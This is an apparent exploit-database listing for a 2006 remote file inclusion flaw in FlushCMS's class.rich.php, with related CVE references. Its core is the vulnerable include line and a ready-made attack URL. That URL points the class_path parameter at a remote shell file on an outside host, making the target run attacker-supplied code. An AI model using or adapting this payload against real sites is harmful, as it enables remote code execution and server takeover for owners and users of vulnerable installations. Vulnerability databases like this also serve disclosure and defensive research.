Lucene search
IgiEDB-ID:2018HistoryJul 16, 2006 - 12:00 a.m.
FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion
2006-07-1600:00:00
igi
www.exploit-db.com
28
AI Score
7.4
Confidence
Low
flushcms (tpath) Remote File Inclusion Vulnerability
virangar security team
www.virangar.org
www.virangar.net
Discoverd By : igi
contact : [email protected]
for all member virangar
bug:
----------------------------------------------------------------------------------------
//language class
require_once($class_path.'rich_files/lang/class.rich_lang.php');
-----------------------------------------------------------------------------------------
simple:http://www.site.com/flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.shell.com/shell.txt?
# milw0rm.com [2006-07-16]Related
cvelist
cvelist
CVE-2006-3754
2006-07-20 23:00:00
CVE-2006-3755
2006-07-20 23:00:00
nvd
nvd
CVE-2006-3755
2006-07-21 14:03:00
CVE-2006-3754
2006-07-21 14:03:00
cve
cve
CVE-2006-3754
2006-07-21 14:03:00
CVE-2006-3755
2006-07-21 14:03:00